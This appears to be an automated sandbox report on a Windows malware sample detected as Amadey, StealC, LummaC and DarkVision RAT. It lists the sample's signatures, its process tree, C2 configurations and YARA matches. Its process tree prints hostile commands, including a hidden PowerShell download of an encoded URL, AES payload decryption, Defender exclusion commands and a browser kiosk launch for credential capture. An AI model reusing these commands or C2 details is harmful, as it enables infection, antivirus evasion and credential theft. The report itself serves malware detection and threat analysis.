Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1571262
MD5:	22bf111e0ffbce40da98521c8ac390ac
SHA1:	86c47f8fc939e81d7ceba37f1824e22ce4ef1f43
SHA256:	0536c8987bbf4c736ee1ffaba0cb1e52d1652574fcb80ab14ff7d23a40e446b2
Tags:	Amadeyexeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected DarkVision Rat

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops script or batch files to the startup folder

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

PE file contains section with special chars

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Remote Thread Creation By Uncommon Source Image

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 22BF111E0FFBCE40DA98521C8AC390AC)

skotes.exe (PID: 4248 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 22BF111E0FFBCE40DA98521C8AC390AC)

skotes.exe (PID: 1860 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 22BF111E0FFBCE40DA98521C8AC390AC)

skotes.exe (PID: 7804 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 22BF111E0FFBCE40DA98521C8AC390AC)

4ZAAIhb.exe (PID: 8000 cmdline: "C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe" MD5: A3D68745E8919E2A48D8FA0738DA124E)

cmd.exe (PID: 8044 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 8100 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 8116 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

powershell.exe (PID: 8132 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2188 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'" MD5: 04029E121A0CFA5991749937DD22A1D9)

timeout.exe (PID: 2680 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)

powershell.exe (PID: 5344 cmdline: powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);" MD5: 04029E121A0CFA5991749937DD22A1D9)

downloaded_file.exe (PID: 736 cmdline: "C:\Users\user\AppData\Local\Temp\downloaded_file.exe" MD5: D60C9E070239F8C240AAA6D8832E11EF)

cmd.exe (PID: 5448 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6480 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

explorer.exe (PID: 2832 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 6044 cmdline: C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8} MD5: 662F4F92FDE3557E86D110526BB578D5)

c92938c010.exe (PID: 7172 cmdline: "C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe" MD5: F15A88B85AFA75FB85FB70E83071E286)

2bd330404c.exe (PID: 1608 cmdline: "C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe" MD5: 1CCD476EF1CB8A55170A6EF196DFB053)

chrome.exe (PID: 7660 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

b5c7128cd0.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe" MD5: 03C3B35F938A1BC015E2579A7FB58015)

taskkill.exe (PID: 6204 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3396 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3520 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3696 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7684 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 3344 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

6dce78ba2b.exe (PID: 5336 cmdline: "C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe" MD5: A45A51347A496E17A3427A34E1B27447)

c92938c010.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe" MD5: F15A88B85AFA75FB85FB70E83071E286)

firefox.exe (PID: 4420 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 4124 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 4624 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2232 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6813d85d-2975-43c3-861c-97300b67dc7e} 4124 "\\.\pipe\gecko-crash-server-pipe.4124" 19ced46f310 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7424 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2696 -parentBuildID 20230927232528 -prefsHandle 4084 -prefMapHandle 3676 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37a942e1-c472-431e-9fe3-e3010ecc3e75} 4124 "\\.\pipe\gecko-crash-server-pipe.4124" 19ced484b10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

svchost.exe (PID: 3744 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

2bd330404c.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe" MD5: 1CCD476EF1CB8A55170A6EF196DFB053)

b5c7128cd0.exe (PID: 7684 cmdline: "C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe" MD5: 03C3B35F938A1BC015E2579A7FB58015)

taskkill.exe (PID: 5932 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

c92938c010.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe" MD5: F15A88B85AFA75FB85FB70E83071E286)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: LummaC

{"C2 url": ["impend-differ.biz", "covery-mover.biz", "se-blurry.biz", "zinc-sneark.biz", "dare-curbys.biz", "print-vexer.biz", "atten-supporse.biz", "formy-spill.biz", "dwell-exclaim.biz"], "Build id": "C7CP--C"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: DarkVision Rat

{"C2": "185.157.162.216", "Port": 5200}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\downloaded_file.exe	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
C:\Users\user\AppData\Local\Temp\downloaded_file.exe	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\downloaded_file.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:

Memory Dumps

Source	Rule	Description	Author	Strings
00000028.00000003.2764516501.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000028.00000003.2764516501.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000002.2782167786.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000028.00000002.2782167786.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000028.00000000.2762690548.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000028.00000000.2762690548.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000026.00000003.2750899040.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000011.00000002.2936414035.0000000000111000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000026.00000002.2936545464.0000000000111000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002C.00000002.2941880948.0000000000AE8000.00000002.00001000.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
0000002C.00000002.2941880948.0000000000AE8000.00000002.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000025.00000002.2751422689.0000027FE834F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000025.00000002.2751422689.0000027FE834F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000011.00000002.2948007674.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000028.00000002.2778572701.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000028.00000002.2778572701.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000011.00000003.2593857071.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000002.2751422689.0000027FE825C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000025.00000002.2751422689.0000027FE825C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 2188	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x68fdd:$b2: ::FromBase64String( 0x690e6:$b2: ::FromBase64String( 0x69cfe:$b2: ::FromBase64String( 0x7461c:$b2: ::FromBase64String( 0x8bf0d:$b2: ::FromBase64String( 0x8c01c:$b2: ::FromBase64String( 0x8c286:$b2: ::FromBase64String( 0x8c396:$b2: ::FromBase64String( 0x8c7f6:$b2: ::FromBase64String( 0x8c8ff:$b2: ::FromBase64String( 0xbb39d:$b2: ::FromBase64String( 0xeae33:$b2: ::FromBase64String( 0xf2ff1:$b2: ::FromBase64String( 0xfeba9:$b2: ::FromBase64String( 0x121df5:$b2: ::FromBase64String( 0x1227aa:$b2: ::FromBase64String( 0x122c69:$b2: ::FromBase64String( 0x122e56:$b2: ::FromBase64String( 0x122f99:$b2: ::FromBase64String( 0x1230dd:$b2: ::FromBase64String( 0x123216:$b2: ::FromBase64String(
Process Memory Space: c92938c010.exe PID: 7172	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: c92938c010.exe PID: 7172	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: c92938c010.exe PID: 7172	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: c92938c010.exe PID: 7172	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 2bd330404c.exe PID: 1608	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 2bd330404c.exe PID: 1608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2bd330404c.exe PID: 1608	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: b5c7128cd0.exe PID: 7568	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
40.0.downloaded_file.exe.cd0000.0.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
40.0.downloaded_file.exe.cd0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
40.0.downloaded_file.exe.cd0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:
40.2.downloaded_file.exe.a2df98.0.raw.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
40.2.downloaded_file.exe.a2df98.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
40.2.downloaded_file.exe.a2df98.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x36ce8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x36c18:$s1: CoGetObject 0x36cb0:$s2: Elevation:Administrator!new:
44.2.explorer.exe.ab0000.0.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
44.2.explorer.exe.ab0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
44.2.explorer.exe.ab0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x36ce8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x36c18:$s1: CoGetObject 0x36cb0:$s2: Elevation:Administrator!new:
37.2.powershell.exe.27fe82da4b0.1.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
37.2.powershell.exe.27fe82da4b0.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
37.2.powershell.exe.27fe82da4b0.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x30d80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x30cc0:$s1: CoGetObject 0x30d48:$s2: Elevation:Administrator!new:
40.2.downloaded_file.exe.cd0000.1.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
40.2.downloaded_file.exe.cd0000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
40.2.downloaded_file.exe.cd0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:
40.2.downloaded_file.exe.a2df98.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
40.2.downloaded_file.exe.a2df98.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x360e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x36018:$s1: CoGetObject 0x360b0:$s2: Elevation:Administrator!new:
37.2.powershell.exe.27fe83582f8.0.raw.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
37.2.powershell.exe.27fe83582f8.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
37.2.powershell.exe.27fe83582f8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:
37.2.powershell.exe.27fe83582f8.0.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
37.2.powershell.exe.27fe83582f8.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
37.2.powershell.exe.27fe83582f8.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x30d80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x30cc0:$s1: CoGetObject 0x30d48:$s2: Elevation:Administrator!new:
37.2.powershell.exe.27fe82da4b0.1.raw.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
37.2.powershell.exe.27fe82da4b0.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
37.2.powershell.exe.27fe82da4b0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:
